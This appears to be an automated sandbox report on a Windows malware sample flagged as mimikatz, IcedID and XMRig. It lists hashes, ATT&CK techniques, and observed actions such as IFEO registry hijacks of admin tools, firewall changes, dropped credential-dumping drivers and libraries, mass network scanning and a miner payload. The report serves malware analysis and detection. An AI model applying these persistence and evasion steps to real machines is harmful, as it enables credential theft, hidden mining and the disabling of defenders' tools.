mimikatz | b7986706052fd6131f4e1e3ca24787e1feac905c1c99e9ee835f247e0d686d85

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240910-en
resource tags

arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
submitted
30-09-2024 09:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-09-30_13344d2d7d7c6512ac06630fe6d38104_hacktools_icedid_mimikatz.exe
Size

14.1MB
MD5

13344d2d7d7c6512ac06630fe6d38104
SHA1

df9c877708b1976b9abe5d4a6a1129b1c6d2d067
SHA256

b7986706052fd6131f4e1e3ca24787e1feac905c1c99e9ee835f247e0d686d85
SHA512

8166d8d0f334331f650bbd763823eaa3efa7d73f801205b46f0225a7263caa27e6d52718a022d61df11c2738a509f90765d6162c625f1abcdc4baeaefbb9e5e2
SSDEEP

98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

vbhcins.exe

description	pid	Process	procid_target
PID 1900 created 2136	1900	vbhcins.exe	38

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (20720) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 10 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/2404-177-0x00007FF6F7B20000-0x00007FF6F7C40000-memory.dmp	xmrig
behavioral2/memory/2404-181-0x00007FF6F7B20000-0x00007FF6F7C40000-memory.dmp	xmrig
behavioral2/memory/2404-198-0x00007FF6F7B20000-0x00007FF6F7C40000-memory.dmp	xmrig
behavioral2/memory/2404-211-0x00007FF6F7B20000-0x00007FF6F7C40000-memory.dmp	xmrig
behavioral2/memory/2404-220-0x00007FF6F7B20000-0x00007FF6F7C40000-memory.dmp	xmrig
behavioral2/memory/2404-235-0x00007FF6F7B20000-0x00007FF6F7C40000-memory.dmp	xmrig
behavioral2/memory/2404-253-0x00007FF6F7B20000-0x00007FF6F7C40000-memory.dmp	xmrig
behavioral2/memory/2404-260-0x00007FF6F7B20000-0x00007FF6F7C40000-memory.dmp	xmrig
behavioral2/memory/2404-280-0x00007FF6F7B20000-0x00007FF6F7C40000-memory.dmp	xmrig
behavioral2/memory/2404-390-0x00007FF6F7B20000-0x00007FF6F7C40000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3176-0-0x0000000000400000-0x0000000000AA4000-memory.dmp	mimikatz
behavioral2/memory/3176-4-0x0000000000400000-0x0000000000AA4000-memory.dmp	mimikatz
behavioral2/files/0x000b000000023b9e-7.dat	mimikatz
behavioral2/memory/2144-8-0x0000000000400000-0x0000000000AA4000-memory.dmp	mimikatz
behavioral2/memory/656-138-0x00007FF7EBEE0000-0x00007FF7EBFCE000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

Processes:

vbhcins.exewpcap.exe

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	vbhcins.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	vbhcins.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs

persistence

Image File Execution Options Injection

T1546.012

Processes:

vbhcins.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbhcins.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	vbhcins.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	vbhcins.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exe

pid	Process
952	netsh.exe
2948	netsh.exe

Executes dropped EXE 29 IoCs

Processes:

vbhcins.exevbhcins.exewpcap.exefevqvtzqb.exevfshost.exexohudmc.execuwouc.exefqqvlziek.exeipqbtt.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exevbhcins.exefqqvlziek.exefqqvlziek.exefqqvlziek.exefqqvlziek.exeidcvbmkyl.exe

pid	Process
2144	vbhcins.exe
1900	vbhcins.exe
2172	wpcap.exe
1888	fevqvtzqb.exe
656	vfshost.exe
2564	xohudmc.exe
3224	cuwouc.exe
4760	fqqvlziek.exe
2404	ipqbtt.exe
2796	fqqvlziek.exe
1984	fqqvlziek.exe
2340	fqqvlziek.exe
1936	fqqvlziek.exe
2948	fqqvlziek.exe
1072	fqqvlziek.exe
992	fqqvlziek.exe
948	fqqvlziek.exe
1596	fqqvlziek.exe
3024	fqqvlziek.exe
3612	fqqvlziek.exe
2172	fqqvlziek.exe
3304	fqqvlziek.exe
1472	fqqvlziek.exe
1684	vbhcins.exe
4604	fqqvlziek.exe
4900	fqqvlziek.exe
4852	fqqvlziek.exe
32	fqqvlziek.exe
5008	idcvbmkyl.exe

Loads dropped DLL 12 IoCs

Processes:

wpcap.exefevqvtzqb.exe

pid	Process
2172	wpcap.exe
2172	wpcap.exe
2172	wpcap.exe
2172	wpcap.exe
2172	wpcap.exe
2172	wpcap.exe
2172	wpcap.exe
2172	wpcap.exe
2172	wpcap.exe
1888	fevqvtzqb.exe
1888	fevqvtzqb.exe
1888	fevqvtzqb.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
89	ifconfig.me
90	ifconfig.me

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 18 IoCs

Processes:

vbhcins.exewpcap.exexohudmc.exe

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	vbhcins.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE	vbhcins.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	vbhcins.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	vbhcins.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	vbhcins.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	vbhcins.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	vbhcins.exe
File created	C:\Windows\SysWOW64\cuwouc.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\cuwouc.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	vbhcins.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	vbhcins.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	vbhcins.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE	vbhcins.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe

UPX packed file 36 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x0007000000023ca3-134.dat	upx
behavioral2/memory/656-135-0x00007FF7EBEE0000-0x00007FF7EBFCE000-memory.dmp	upx
behavioral2/memory/656-138-0x00007FF7EBEE0000-0x00007FF7EBFCE000-memory.dmp	upx
behavioral2/memory/4760-157-0x00007FF6FD970000-0x00007FF6FD9CB000-memory.dmp	upx
behavioral2/files/0x0007000000023cae-156.dat	upx
behavioral2/memory/4760-161-0x00007FF6FD970000-0x00007FF6FD9CB000-memory.dmp	upx
behavioral2/memory/2404-165-0x00007FF6F7B20000-0x00007FF6F7C40000-memory.dmp	upx
behavioral2/files/0x0007000000023cab-163.dat	upx
behavioral2/memory/2796-168-0x00007FF6FD970000-0x00007FF6FD9CB000-memory.dmp	upx
behavioral2/memory/1984-174-0x00007FF6FD970000-0x00007FF6FD9CB000-memory.dmp	upx
behavioral2/memory/2404-177-0x00007FF6F7B20000-0x00007FF6F7C40000-memory.dmp	upx
behavioral2/memory/2340-179-0x00007FF6FD970000-0x00007FF6FD9CB000-memory.dmp	upx
behavioral2/memory/2404-181-0x00007FF6F7B20000-0x00007FF6F7C40000-memory.dmp	upx
behavioral2/memory/1936-184-0x00007FF6FD970000-0x00007FF6FD9CB000-memory.dmp	upx
behavioral2/memory/2948-188-0x00007FF6FD970000-0x00007FF6FD9CB000-memory.dmp	upx
behavioral2/memory/1072-192-0x00007FF6FD970000-0x00007FF6FD9CB000-memory.dmp	upx
behavioral2/memory/992-196-0x00007FF6FD970000-0x00007FF6FD9CB000-memory.dmp	upx
behavioral2/memory/2404-198-0x00007FF6F7B20000-0x00007FF6F7C40000-memory.dmp	upx
behavioral2/memory/948-201-0x00007FF6FD970000-0x00007FF6FD9CB000-memory.dmp	upx
behavioral2/memory/1596-205-0x00007FF6FD970000-0x00007FF6FD9CB000-memory.dmp	upx
behavioral2/memory/3024-209-0x00007FF6FD970000-0x00007FF6FD9CB000-memory.dmp	upx
behavioral2/memory/2404-211-0x00007FF6F7B20000-0x00007FF6F7C40000-memory.dmp	upx
behavioral2/memory/3612-214-0x00007FF6FD970000-0x00007FF6FD9CB000-memory.dmp	upx
behavioral2/memory/2172-218-0x00007FF6FD970000-0x00007FF6FD9CB000-memory.dmp	upx
behavioral2/memory/2404-220-0x00007FF6F7B20000-0x00007FF6F7C40000-memory.dmp	upx
behavioral2/memory/3304-223-0x00007FF6FD970000-0x00007FF6FD9CB000-memory.dmp	upx
behavioral2/memory/1472-227-0x00007FF6FD970000-0x00007FF6FD9CB000-memory.dmp	upx
behavioral2/memory/4604-234-0x00007FF6FD970000-0x00007FF6FD9CB000-memory.dmp	upx
behavioral2/memory/2404-235-0x00007FF6F7B20000-0x00007FF6F7C40000-memory.dmp	upx
behavioral2/memory/4900-237-0x00007FF6FD970000-0x00007FF6FD9CB000-memory.dmp	upx
behavioral2/memory/4852-239-0x00007FF6FD970000-0x00007FF6FD9CB000-memory.dmp	upx
behavioral2/memory/32-241-0x00007FF6FD970000-0x00007FF6FD9CB000-memory.dmp	upx
behavioral2/memory/2404-253-0x00007FF6F7B20000-0x00007FF6F7C40000-memory.dmp	upx
behavioral2/memory/2404-260-0x00007FF6F7B20000-0x00007FF6F7C40000-memory.dmp	upx
behavioral2/memory/2404-280-0x00007FF6F7B20000-0x00007FF6F7C40000-memory.dmp	upx
behavioral2/memory/2404-390-0x00007FF6F7B20000-0x00007FF6F7C40000-memory.dmp	upx

Drops file in Program Files directory 3 IoCs

Processes:

wpcap.exe

description	ioc	Process
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

Processes:

vbhcins.execmd.exeidcvbmkyl.exe2024-09-30_13344d2d7d7c6512ac06630fe6d38104_hacktools_icedid_mimikatz.exe

description	ioc	Process
File created	C:\Windows\rvficvimb\UnattendGC\specials\ssleay32.dll	vbhcins.exe
File opened for modification	C:\Windows\cqeebcbu\docmicfg.xml	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\Shellcode.ini	vbhcins.exe
File created	C:\Windows\rvficvimb\etmcietlm\wpcap.exe	vbhcins.exe
File created	C:\Windows\rvficvimb\etmcietlm\fevqvtzqb.exe	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\spoolsrv.xml	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\svschost.xml	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\vimpcsvc.xml	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\docmicfg.xml	vbhcins.exe
File created	C:\Windows\rvficvimb\etmcietlm\ip.txt	vbhcins.exe
File created	C:\Windows\rvficvimb\etmcietlm\scan.bat	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\crli-0.dll	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\posh-0.dll	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\zlib1.dll	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\schoedcl.xml	vbhcins.exe
File created	C:\Windows\cqeebcbu\docmicfg.xml	vbhcins.exe
File created	C:\Windows\cqeebcbu\schoedcl.xml	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\AppCapture64.dll	vbhcins.exe
File opened for modification	C:\Windows\rvficvimb\etmcietlm\Packet.dll	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\coli-0.dll	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\spoolsrv.exe	vbhcins.exe
File created	C:\Windows\rvficvimb\Corporate\mimilib.dll	vbhcins.exe
File opened for modification	C:\Windows\rvficvimb\Corporate\log.txt	cmd.exe
File opened for modification	C:\Windows\rvficvimb\etmcietlm\Result.txt	idcvbmkyl.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\cnli-1.dll	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\libeay32.dll	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\schoedcl.exe	vbhcins.exe
File created	C:\Windows\cqeebcbu\svschost.xml	vbhcins.exe
File opened for modification	C:\Windows\cqeebcbu\spoolsrv.xml	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\tucl-1.dll	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\svschost.exe	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\vimpcsvc.xml	vbhcins.exe
File created	C:\Windows\rvficvimb\upbdrjv\swrpwe.exe	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\vimpcsvc.exe	vbhcins.exe
File created	C:\Windows\cqeebcbu\spoolsrv.xml	vbhcins.exe
File created	C:\Windows\cqeebcbu\vimpcsvc.xml	vbhcins.exe
File created	C:\Windows\ime\vbhcins.exe	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\svschost.xml	vbhcins.exe
File created	C:\Windows\cqeebcbu\vbhcins.exe	2024-09-30_13344d2d7d7c6512ac06630fe6d38104_hacktools_icedid_mimikatz.exe
File created	C:\Windows\rvficvimb\etmcietlm\wpcap.dll	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\xdvl-0.dll	vbhcins.exe
File opened for modification	C:\Windows\cqeebcbu\vbhcins.exe	2024-09-30_13344d2d7d7c6512ac06630fe6d38104_hacktools_icedid_mimikatz.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\trch-1.dll	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\docmicfg.exe	vbhcins.exe
File opened for modification	C:\Windows\cqeebcbu\schoedcl.xml	vbhcins.exe
File created	C:\Windows\rvficvimb\etmcietlm\Packet.dll	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\exma-1.dll	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\trfo-2.dll	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\spoolsrv.xml	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\schoedcl.xml	vbhcins.exe
File opened for modification	C:\Windows\cqeebcbu\svschost.xml	vbhcins.exe
File opened for modification	C:\Windows\cqeebcbu\vimpcsvc.xml	vbhcins.exe
File created	C:\Windows\rvficvimb\Corporate\vfshost.exe	vbhcins.exe
File created	C:\Windows\rvficvimb\Corporate\mimidrv.sys	vbhcins.exe
File created	C:\Windows\rvficvimb\etmcietlm\idcvbmkyl.exe	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\libxml2.dll	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\tibe-2.dll	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\specials\ucl.dll	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\docmicfg.xml	vbhcins.exe
File created	C:\Windows\rvficvimb\UnattendGC\AppCapture32.dll	vbhcins.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid	Process
2444	sc.exe
4720	sc.exe
3468	sc.exe
1788	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
